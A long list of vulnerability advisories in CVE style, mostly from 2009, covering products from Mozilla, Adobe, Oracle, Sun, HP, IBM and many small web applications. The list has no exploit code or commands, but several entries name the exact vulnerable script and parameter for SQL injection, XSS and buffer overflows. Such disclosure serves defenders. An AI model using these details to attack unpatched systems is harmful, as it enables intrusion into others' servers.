Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.0.14 and 3.5.x before 3.5.3, Thunderbird before 2.0.0.24, and SeaMonkey before 1.1.19 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors related to the BinHex decoder in netwerk/streamconv/converters/nsBinHexDecoder.cpp, and unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.0.14, and 3.5.x before 3.5.2, allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.0.14 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.5.x before 3.5.3 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
An unspecified ActiveX control in Adobe Reader and Acrobat 9.x before 9.2, 8.x before 8.1.7, and possibly 7.x through 7.1.4 does not properly validate input, which allows attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the Mozilla plug-in in Adobe Reader and Acrobat 8.x before 8.1.7, and possibly 7.x before 7.1.4 and 9.x before 9.2, might allow remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in an ActiveX control in Adobe Reader and Acrobat 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2 on Windows allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the image decoder in Adobe Acrobat 9.x before 9.2, and possibly 7.x through 7.1.4 and 8.x through 8.1.7, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors.
An unspecified certificate in Adobe Reader and Acrobat 9.x before 9.2, 8.x before 8.1.7, and possibly 7.x through 7.1.4 might allow remote attackers to conduct a "social engineering attack" via unknown vectors.
Unspecified vulnerability in the pollwakeup function in Sun Solaris 10, and OpenSolaris before snv_51, allows local users to cause a denial of service (panic) via unknown vectors.
Cross-site scripting (XSS) vulnerability in index.php in XZero Community Classifieds 4.97.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the name of an uploaded file. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in XZero Community Classifieds 4.97.8 allows remote attackers to inject arbitrary web script or HTML via the URI.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the Permis (com_groups) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a list action to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.27 allows remote attackers to cause a denial of service via unknown vectors, related to "an error in fixpacks 6.1.0.23 and 6.1.0.25."
Unspecified vulnerability in the wberuntimeear application in the test servlet in IBM WebSphere Business Events 6.1 and 6.2 allows remote attackers to execute arbitrary code via unknown vectors.
Cross-site scripting (XSS) vulnerability in FreeNAS before 0.69.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the WebGUI in FreeNAS before 0.7RC1 allows remote attackers to hijack the authentication of users for unspecified requests via unknown vectors.
Race condition in the java.lang package in Sun Java SE 5.0 before Update 20 has unknown impact and attack vectors, related to a "3Y Race condition in reflection checks."
Unspecified vulnerability in deserialization in the Provider class in Sun Java SE 5.0 before Update 20 has unknown impact and attack vectors, aka BugId 6444262.
Multiple unspecified vulnerabilities in the Provider class in Sun Java SE 5.0 before Update 20 have unknown impact and attack vectors, aka BugId 6429594.  NOTE: this issue exists because of an incorrect fix for BugId 6406003.
Multiple unspecified vulnerabilities in the Provider class in Sun Java SE 5.0 before Update 20 have unknown impact and attack vectors, aka BugId 6406003.
Unspecified vulnerability in the javax.swing.plaf.synth.SynthContext.isSubregion method in the Swing implementation in Sun Java SE 6 before Update 15 allows context-dependent attackers to cause a denial of service (NullPointerException in the Jemmy library) via unknown vectors.
The plugin functionality in Sun Java SE 6 before Update 15 does not properly implement version selection, which allows context-dependent attackers to leverage vulnerabilities in "old zip and certificate handling" and have unspecified other impact via unknown vectors.
Unspecified vulnerability in Sun VirtualBox 3.0.0 and 3.0.2 allows guest OS users to cause a denial of service (host OS reboot) via unknown vectors.
Unspecified vulnerability in the Zope Enterprise Objects (ZEO) storage-server functionality in Zope Object Database (ZODB) 3.8 before 3.8.3 and 3.9.x before 3.9.0c2, when certain ZEO database sharing and blob support are enabled, allows remote authenticated users to read or delete arbitrary files via unknown vectors.
Multiple integer overflows in glyphs-eimage.c in XEmacs 21.4.22, when running on Windows, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via (1) the tiff_instantiate function processing a crafted TIFF file, (2) the png_instantiate function processing a crafted PNG file, and (3) the jpeg_instantiate function processing a crafted JPEG file, all which trigger a heap-based buffer overflow.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in HP NonStop G06.12.00 through G06.32.00, H06.08.00 through H06.18.01, and J06.04.00 through J06.07.01 allows local users to gain privileges, cause a denial of service, or obtain "access to data" via unknown vectors.
Unspecified vulnerability in the Sender module in HP Remote Graphics Software (RGS) 5.1.3 through 5.2.6 allows remote authenticated users to execute arbitrary code via unknown vectors.
Unspecified vulnerability in Role-Based Access Control (RBAC) in HP HP-UX B.11.23 and B.11.31 allows local users to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in HP ProCurve Identity Driven Manager (IDM) A.02.x through A.02.03 and A.03.x through A.03.00, on Windows Server 2003 with IAS and Windows Server 2008 with NPS, allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in the Remote Management Interface (RMI) for MSL Tape Libraries and 1/8 G2 Tape Autoloaders in HP StorageWorks 1/8 G2 Tape Autoloader firmware 2.30 and earlier, MSL2024 Tape Library firmware 4.20 and earlier, MSL4048 Tape Library firmware 6.50 and earlier, and MSL8096 Tape Library firmware 8.90 and earlier allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in bootpd in HP HP-UX B.11.11, B.11.23, and B.11.31 allows remote attackers to cause a denial of service via unknown attack vectors.
Unspecified vulnerability in Open System Services (OSS) Name Server on HP NonStop G06.27, G06.28, G06.29, G06.30, H06.06, H06.07, H06.08, and J06.03 allows remote attackers to obtain sensitive information via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Insight Control Suite For Linux (aka ICE-LX) before 2.11 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in IBM Tivoli Key Lifecycle Manager (TKLM) 1.0 has unknown impact and attack vectors, related to a "password security vulnerability."
Unspecified vulnerability in Kaspersky Anti-Virus 2010 and Kaspersky Internet Security 2010 before Critical Fix 9.0.0.463 allows remote attackers to disable the Kaspersky application via unknown attack vectors unrelated to "an external script."
SQL injection vulnerability in login.asp in DataCheck Solutions V-SpacePal allows remote attackers to execute arbitrary SQL commands via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in z_admin_login.asp in DataCheck Solutions SitePal 1.x allows remote attackers to execute arbitrary SQL commands via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in DataCheck Solutions SitePal 1.x allow remote attackers to inject arbitrary web script or HTML via the page parameter to (1) z_admin_login.asp, (2) z_forgot.asp, and possibly unspecified other components.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in z_admin_login.asp in DataCheck Solutions LinkPal 1.x allows remote attackers to execute arbitrary SQL commands via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in DataCheck Solutions LinkPal 1.x allow remote attackers to inject arbitrary web script or HTML via the page parameter to (1) z_loginfailed.asp, (2) z_admin_login.asp, (3) z_forgot.asp, and possibly unspecified other components.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in login.aspx in ProSMDR allows remote attackers to execute arbitrary SQL commands via the txtUser parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Infiniband dissector in Wireshark 1.0.6 through 1.2.0, when running on unspecified platforms, allows remote attackers to cause a denial of service (crash) via unknown vectors.
Unspecified vulnerability in the AFS dissector in Wireshark 0.9.2 through 1.2.0 allows remote attackers to cause a denial of service (crash) via unknown vectors.
Directory traversal vulnerability in Advanced Electron Forum (AEF) 1.x allows remote attackers to determine the existence of arbitrary files via the avatargalfile parameter when changing an avatar, which leaks the existence of the file in an error message.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in Advanced Electron Forum (AEF) 1.x, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the filename in an uploaded attachment. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Heap-based buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 allows remote attackers to execute arbitrary code via unspecified parameters to unknown methods, aka "Office Web Components Heap Corruption Vulnerability."
The utaudiod daemon in Sun Ray Server Software (SRSS) 4.0, when Solaris Trusted Extensions is enabled, allows local users to access the sessions of arbitrary users via unknown vectors related to "resource leaks."
Unspecified vulnerability in the utaudiod daemon in Sun Ray Server Software (SRSS) 4.0, when Solaris Trusted Extensions is enabled, allows local users to cause a denial of service (audio outage) or possibly gain privileges via unknown vectors related to "resource leaks."
Unspecified vulnerability in the utdmsession program in Sun Ray Server Software (SRSS) 4.0 allows local users to access the sessions of arbitrary users via unknown vectors.
Multiple unspecified vulnerabilities in mimeTeX, when downloaded before 20090713, have unknown impact and attack vectors related to the (1) \environ, (2) \input, and (3) \counter TeX directives.
Unspecified vulnerability in Sun Fire V215 Server, when using XVR-100 graphic cards on system boards with part number 375-3463 and a hardware dash level -04 or later, allows remote attackers to cause a denial of service (panic) via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in webadmin/admin.php in @mail 5.6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) type and (2) func parameters. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Citrix XenApp (formerly Presentation Server) 4.5 Hotfix Rollup Pack 3 does not apply an access policy when it is defined with the Access Gateway Advanced Edition filters, which allows attackers to bypass intended access restrictions via unknown vectors.
Multiple unspecified vulnerabilities in Citrix Licensing 11.5 have unknown impact and attack vectors, related to "underlying components of the License Management Console."
Cross-site scripting (XSS) vulnerability in ogp_show.php in Online Guestbook Pro 5.1 allows remote attackers to inject arbitrary web script or HTML via the search_choice parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in auditconfig in Sun Solaris 8, 9, 10, and OpenSolaris snv_01 through snv_58, when Solaris Auditing is enabled, allows local users with an RBAC execution profile for auditconfig to gain privileges via unknown attack vectors.
SmartFilter Web Gateway Security 4.2.1.00 stores user credentials in cleartext in admin_backup.xml files and uses insecure permissions for these files, which allows local users to gain privileges.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The connection_edge_process_relay_cell_not_open function in src/or/relay.c in Tor 0.2.x before 0.2.0.35 and 0.1.x before 0.1.2.8-beta allows exit relays to have an unspecified impact by causing controllers to accept DNS responses that redirect to an internal IP address via unknown vectors.  NOTE: some of these details are obtained from third party information.
admin/index.php in Virtuenetz Virtue Online Test Generator does not require administrative privileges, which allows remote authenticated users to have an unknown impact via unspecified vectors.
SQL injection vulnerability in admin/index.php in Opial 1.0 allows remote attackers to execute arbitrary SQL commands via the txtPassword parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the proc filesystem in Sun OpenSolaris snv_49 through snv_109 allows local users to cause a denial of service (deadlock and panic) via unknown vectors, related to the ldt_rewrite_syscall function.
Integer overflow in the wxImage::Create function in src/common/image.cpp in wxWidgets 2.8.10 allows attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted JPEG file, which triggers a heap-based buffer overflow.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Socks Server 5 before 3.7.8-8 has unknown impact and attack vectors.
SQL injection vulnerability in login.asp in DataCheck Solutions GalleryPal FE 1.5 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in ClanSphere before 2009.0.1 allow remote attackers to execute arbitrary SQL commands via unknown parameters to the gbook module and unspecified other components.
The Virtual Network Terminal Server daemon (vntsd) for Logical Domains (aka LDoms) in Sun Solaris 10, and OpenSolaris snv_41 through snv_108, on SPARC platforms does not check authorization for guest console access, which allows local control-domain users to gain guest-domain privileges via unknown vectors.
SQL injection vulnerability in active_appointments.asp in ASP Inline Corporate Calendar allows remote attackers to execute arbitrary SQL commands via the sortby parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Views Bulk Operations 5.x-1.x before 5.x-1.4 and 6.x-1.x before 6.x-1.7, a module for Drupal, allows remote attackers to bypass intended access restrictions and modify "nodes or classes of nodes" via unknown vectors, probably related to registered procedures (aka actions).
SQL injection vulnerability in image.php in Softbiz Banner Ad Management Script allows remote attackers to execute arbitrary SQL commands via the size_id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Stack-based buffer overflow in SureThing CD/DVD Labeler 5.1.616 trial version allows user-assisted remote attackers to execute arbitrary code via a crafted (1) m3u or (2) pls playlist file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Apple Safari 4 before 4.0.3 allows remote web servers to place an arbitrary web site in the Top Sites view, and possibly conduct phishing attacks, via unknown vectors.
Unspecified vulnerability in Adobe Shockwave Player before 11.0.0.465 allows remote attackers to execute arbitrary code via unknown vectors, a different vulnerability than CVE-2009-1860, related to an older issue that "was previously resolved in Shockwave Player 11.0.0.465."
Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.0 before 1.0.12 and 1.1 before 1.1.5 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site scripting (XSS) vulnerability in report/ReportViewAction.do in WebNMS Free Edition 5 allows remote attackers to inject arbitrary web script or HTML via the type parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in IBM WebSphere Commerce 6.0 Enterprise before 6.0.0.8, when trace is enabled, allows local users to obtain sensitive information via unknown vectors.
IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.5 does not properly read the portletServingEnabled parameter in ibm-portlet-ext.xmi, which allows remote attackers to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in wsadmin in the System Management/Repository component in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.5 allows remote attackers to bypass intended Java Management Extensions (JMX) Management Beans (aka MBeans) access restrictions, and cause a denial of service (daemon stop), via unknown vectors.
Nodequeue 5.x before 5.x-2.7 and 6.x before 6.x-2.2, a module for Drupal, does not properly restrict access when displaying node titles, which has unknown impact and attack vectors.
Cross-site request forgery (CSRF) vulnerability in Linksys WRT160N wireless router hardware 1 and firmware 1.02.2 allows remote attackers to hijack the authentication of other users for unspecified requests via unknown vectors, as demonstrated using administrator privileges and actions.
Unspecified vulnerability in the Luottokunta module before 1.3 for osCommerce has unknown impact and attack vectors related to orders.
Unspecified vulnerability in the Finnish Bank Payment module 2.2 for osCommerce has unknown impact and attack vectors related to bank charges.
Unspecified vulnerability in the XML Digital Signature verification functionality in JVA-RUN in JDK 6.0 in IBM OS/400 i5/OS V5R4M0 and V6R1M0 has unknown impact and attack vectors related to "XML SECURITY PATCH."
Multiple unspecified vulnerabilities in Adobe Reader 7 and Acrobat 7 before 7.1.3, Adobe Reader 8 and Acrobat 8 before 8.1.6, and Adobe Reader 9 and Acrobat 9 before 9.1.2 have unknown impact and attack vectors, related to "Adobe internally discovered issues."
Unspecified vulnerability in idmap in Sun OpenSolaris snv_88 through snv_110, when a CIFS server is enabled, allows local users to cause a denial of service (idpmapd daemon crash and idmapd outage) via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in Dokeos 1.8.5, and possibly earlier, allows remote attackers to hijack the authentication of unspecified victims and add new personal agenda items via unknown vectors.
Unspecified vulnerability in the WebLogic Portal component in BEA Product Suite 8.1.6, 9.2.3, 10.0.1, 10.2.1, and 10.3.1.0.0 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the PL/SQL component in Oracle Database 10.2.0.4 and 11.1.0.7 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Authentication component in Oracle Database 11.1.0.7 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Business Intelligence Enterprise Edition component in unspecified Oracle Application Server versions allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Communications Order and Service Management component in Oracle Industry Applications 2.8.0, 6.2.0, 6.3.0, and 6.3.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Authentication component in Oracle Database 10.2.0.3 and 11.1.0.7 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Logical Standby component in Oracle Database allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.2.0.8, 10.1.0.5, and 10.2.0.4 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Business Intelligence Enterprise Edition component in Oracle Application Server 10.1.3.4.1 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise FMS component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.8 SP1, 8.9 Bundle 33, and 9.0 Bundle 24 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS eProfile Manager component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.8 SP1, 8.9 Bundle 19, and 9.0 Bundle 9 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools - Enterprise Portal component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.21 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Applications Manager component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Network Authentication component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.4 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Application Install component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to the Patch Administrator.
Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2 and 12.0.6 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Highly Interactive Client component in Siebel Product Suite 7.5.3, 7.7.2, 7.8.2, 8.0.0.5, and 8.1.0 allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Network Authentication component in Oracle Database 10.1.0.5 and 10.2.0.4 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2009 CPU.  Oracle has not commented on claims from an independent researcher that this is related to improper validation of the AUTH_SESSKEY parameter length that leads to arbitrary code execution.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the July 2009 Oracle CPU. Oracle has not commented on claims from an independent researcher that this vulnerability allows remote authenticated users to execute arbitrary code with SYSTEM privileges via vectors involving property_box.php.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the July 2009 Oracle CPU. Oracle has not commented on claims from an independent researcher that this vulnerability allows attackers to bypass authentication via unknown vectors involving the username parameter and login.php.
Unspecified vulnerability in the HTTP Server component in Oracle Application Server 10.1.2.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to the Servlet Container Package.
Unspecified vulnerability in the Data Pump component in Oracle Database 10.1.0.5, 10.2.0.3, and 11.1.0.7 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Listener component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2009-0991.
Unspecified vulnerability in the Auditing component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Secure Enterprise Search component in Oracle Database 10.1.8.3 allows remote attackers to affect integrity via unknown vectors.  NOTE: the previous information was obtained from the July 2009 CPU.  Oracle has not commented on claims from an established researcher that this is cross-site scripting (XSS) via the search_p_groups parameter in search/query/search.
Unspecified vulnerability in the Config Management component in (1) Oracle Database 11.1.0.7 and (2) Oracle Enterprise Manager 10.2.0.4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-1966.
Unspecified vulnerability in the Config Management component in (1) Oracle Database 11.1.0.7 and (2) Oracle Enterprise Manager 10.2.0.4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-1967.
Unspecified vulnerability in the Net Foundation Layer component in Oracle Database 9.2.0.8 and 10.1.0.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Workspace Manager component in Oracle Database 10.2.0.4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Network Foundation component in Oracle Database 11.1.0.6 allows remote authenticated users to affect integrity and availability via unknown vectors.
Unspecified vulnerability in portmapper (aka portmap) in IBM AIX 5.3 allows attackers to cause a denial of service (daemon hang) via unknown vectors, related to libtli.
Heap-based buffer overflow in the Microsoft Terminal Services Client ActiveX control running RDP 6.1 on Windows XP SP2, Vista SP1 or SP2, or Server 2008 Gold or SP2; or 5.2 or 6.1 on Windows XP SP3; allows remote attackers to execute arbitrary code via unspecified parameters to unknown methods, aka "Remote Desktop Connection ActiveX Control Heap Overflow Vulnerability."
The Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 permits "non-standard http methods," which has unknown impact and remote attack vectors.
Unspecified vulnerability in the Administrative Configservice API in the System Management/Repository component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35, 6.1 before 6.1.0.25, and 7.0 before 7.0.0.5 on z/OS allows remote authenticated users to obtain sensitive information via unknown use of the wsadmin scripting tool, related to a "security exposure in wsadmin."
Unspecified vulnerability in Adobe Flash Player before 9.0.246.0 and 10.x before 10.0.32.18, and Adobe AIR before 1.5.2, allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors, related to a "privilege escalation vulnerability."
SQL injection vulnerability in include.php in phpBugTracker 1.0.4 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in IBM Hardware Management Console (HMC) 7 release 3.4.0 SP2, when Active Memory Sharing is used, has unknown impact and attack vectors, related to a shared memory partition and a shared memory pool with redundant paging Virtual I/O Server (VIOS) partitions.  NOTE: some of these details are obtained from third party information.
Unspecified vulnerability in the VMware Descheduled Time Accounting driver in VMware Workstation 6.5.1 and earlier, VMware Player 2.5.1 and earlier, VMware ACE 2.5.1 and earlier, VMware Server 1.x before 1.0.9 build 156507 and 2.x before 2.0.1 build 156745, VMware Fusion 2.x before 2.0.2 build 147997, VMware ESXi 3.5, and VMware ESX 3.0.2, 3.0.3, and 3.5, when the Descheduled Time Accounting Service is not running, allows guest OS users on Windows to cause a denial of service via unknown vectors.
Cross-site scripting (XSS) vulnerability in Ulteo Open Virtual Desktop 1.0 allows remote attackers to inject arbitrary web script or HTML via the error parameter to header.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Solaris Secure Digital slot driver (aka sdhost) in Sun OpenSolaris snv_105 through snv_108 on the x86 platform allows local users to gain privileges or cause a denial of service (filesystem or memory corruption) via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in Transmission 1.5 before 1.53 and 1.6 before 1.61 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple heap-based buffer overflows in the D-Link MPEG4 Viewer ActiveX Control (csviewer.ocx) 2.11.918.2006 allow remote attackers to execute arbitrary code via a long argument to the (1) SetFilePath and (2) SetClientCookie methods.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in IPplan 4.91a allows remote attackers to hijack the authentication of administrators for requests that (1) change the password, (2) add users, or (3) delete users via unknown vectors.
Multiple unspecified vulnerabilities in CycloMedia CycloScopeLite 2.50.3.0 allow remote attackers to execute arbitrary code via the ReturnConnection method in (1) CM_ADOConnection.dll, (2) CM_AddressInfoDBC.dll, and (3) CM_RecordingLocationDBC.dll, related to improper dereferencing.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Xerox WorkCentre and WorkCentre Pro 232, 238, 245, 255, 265, 275; and WorkCentre 5632, 5638, 5645, 5655, 5665, 5675, 5687, 7655, 7656, and 7675 allows remote attackers to execute arbitrary commands via unknown attack vectors, aka "command injection vulnerability."
Multiple stack-based and heap-based buffer overflows in Dafolo DafoloControl ActiveX control (DafoloFFControl.dll) 1.108.6.195 allow remote attackers to execute arbitrary code via long (1) baseurl, (2) kommune, (3) felter, (4) afdeling, (5) Flags, (6) HelpURL, (7) caburl, or (8) filename properties; or (9) a long argument to the Open method. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in LimeSurvey before 1.82 allows remote attackers to execute commands and obtain sensitive data via unknown attack vectors related to /admin/remotecontrol/.
Unspecified vulnerability in CGI RESCUE MiniBBS22 before 1.01 allows remote attackers to send email to arbitrary recipients via unknown vectors.
Multiple SQL injection vulnerabilities in TemaTres 1.031, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) id_correo_electronico and (2) id_password parameters to login.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The IBM Tivoli Storage Manager (TSM) client 5.5.0.0 through 5.5.1.17 on AIX and Windows, when SSL is used, allows remote attackers to conduct unspecified man-in-the-middle attacks and read arbitrary files via unknown vectors.
Unspecified vulnerability in the Java GUI in the IBM Tivoli Storage Manager (TSM) client 5.2.0.0 through 5.2.5.3, 5.3.0.0 through 5.3.6.5, 5.4.0.0 through 5.4.2.6, and 5.5.0.0 through 5.5.1.17, and the TSM Express client 5.3.3.0 through 5.3.6.5, allows attackers to read or modify arbitrary files via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in Beltane before 2.3.11 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the web mail interface feature in AXIGEN Mail Server 6.2.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving e-mail messages.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in action.asp in PuterJam's Blog (PJBlog3) 3.0.6.170 allows remote attackers to execute arbitrary SQL commands via the cname parameter in a checkAlias action, as exploited in the wild in April 2009.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the DTrace ioctl handlers in Sun Solaris 10, and OpenSolaris before snv_114, allow local users to cause a denial of service (panic) via unknown vectors.
Cross-site scripting (XSS) vulnerability in player.php in Nuke Evolution Xtreme 2.x allows remote attackers to inject arbitrary web script or HTML via the defaultVisualExt parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the Server component in OCS Inventory NG before 1.02 have unknown impact and attack vectors.
Unspecified vulnerability in HP-UX B.11.31 allows local users to cause a denial of service (system crash) via unknown vectors related to the ttrace system call.
Unspecified vulnerability on HP ProLiant DL and ML 100 Series G5, G5p, and G6 servers with ProLiant Onboard Administrator Powered by LO100i (formerly Lights Out 100) 3.07 and earlier allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP ProCurve Threat Management Services zl Module (J9155A) ST.1.0.090213 and earlier allows remote attackers to cause a denial of service via unknown vectors, aka PR_39412, a different vulnerability than CVE-2009-1423 and CVE-2009-1425.
Unspecified vulnerability in HP ProCurve Threat Management Services zl Module (J9155A) ST.1.0.090213 and earlier allows remote attackers to cause a denial of service via unknown vectors, aka PR_39898, a different vulnerability than CVE-2009-1424 and CVE-2009-1425.
Unspecified vulnerability in HP ProCurve Threat Management Services zl Module (J9155A) ST.1.0.090213 and earlier allows remote attackers to gain privileges via unknown vectors, aka PR_41209.
